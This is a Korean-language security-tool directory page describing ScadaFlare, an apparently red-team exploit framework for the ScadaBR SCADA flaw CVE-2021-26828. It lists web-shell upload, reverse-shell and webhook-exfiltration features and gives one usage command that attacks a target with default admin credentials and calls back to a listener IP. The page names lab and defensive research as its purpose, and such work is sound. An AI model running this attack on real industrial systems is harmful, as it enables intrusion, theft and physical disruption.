Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare 인증된 RCE 익스플로잇 프레임워크 for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
도구/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Payload GenerationVulnerability AnalysisExploitationSCADA/ICS SecurityWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare 인증된 RCE 익스플로잇 프레임워크 for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

599개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

ScadaFlare - CVE-2021-26828 인증된 RCE 익스플로잇 툴킷

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

ScadaBR <1.1.0을 대상으로 하는 모듈식 인증 후 RCE 익스플로잇으로, 레드팀 작업을 위해 강화되었습니다.

ScadaFlare 데모

기능

  • 무기화된 .jsp 셸을 view_edit.shtm을 통해 업로드합니다.
  • Linux 및 Windows 페이로드 지원
  • SOCKS5 / HTTP 프록시 지원
  • 리버스 셸 트리거 (표준 또는 base64)
  • 열거 모듈 (DB, 자격 증명, Log4Shell 등)
  • 웹훅 유출 (Slack / Discord)
  • Metasploit 리소스 스크립트 생성
  • 정리 지원 (킬 스위치)

MITRE ATT&CK 기술 매핑

CVE

  • CVE-2021-26828
  • Fellipe Oliveira가 발견함
  • 익스플로잇 강화 및 모듈화됨

존재 이유

이 익스플로잇은 HTB Pro Lab: Alchemy 시나리오 분석 중에 개발되었습니다. Fellipe Oliveira의 원본 PoC는 견고했지만, 다음과 같은 단점이 있었습니다:

Python 2로 작성됨

프록시 지원, 셸 정리, 열거 체인과 같은 현대적인 기능 부족

확장하거나 레드팀 워크플로우에 통합하기 어려움

이 버전인 ScadaFlare는 모듈 지원, 여러 우회 전략, OS 탐지 재정의, 웹훅 통합, SOCKS 프록시 지원, 실제 운영자 사용을 위한 열거 체인을 갖춘 Python 3 전체 재작성입니다.

사용법

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

법적 및 윤리적 사용 전용

ScadaFlare는 오직 다음 용도로만 설계되었습니다:

  • 윤리적 해킹 교육
  • SCADA 랩 테스트
  • 방어 연구 및 취약점 검증

실제 산업 시스템에 대한 무단 사용은 다음을 초래할 수 있습니다:

  • 물리적 프로세스 방해
  • 손상 또는 안전 위험 초래
  • 심각한 법적 결과 초래

이 도구를 사용함으로써 귀하는 다음에 대한 전적인 책임을 수락합니다:

  • 명시적 서면 승인 획득
  • 승인된 환경 내에서만 운영

라이선스

MIT 라이선스 – LICENSE 참조

도구 다운로드
단계기술ID
초기 접근 (인증 후)유효한 계정T1078
실행공개 애플리케이션 익스플로잇T1190
명령 실행웹 셸T1505.003
권한 작업웹 콘텐츠 수정T1505
자격 증명 접근구성 파일 내 자격 증명T1552.001
탐색원격 시스템 탐색T1018
유출웹 서비스를 통한 유출T1567.002
방어 회피프록시 및 프로토콜 터널링T1090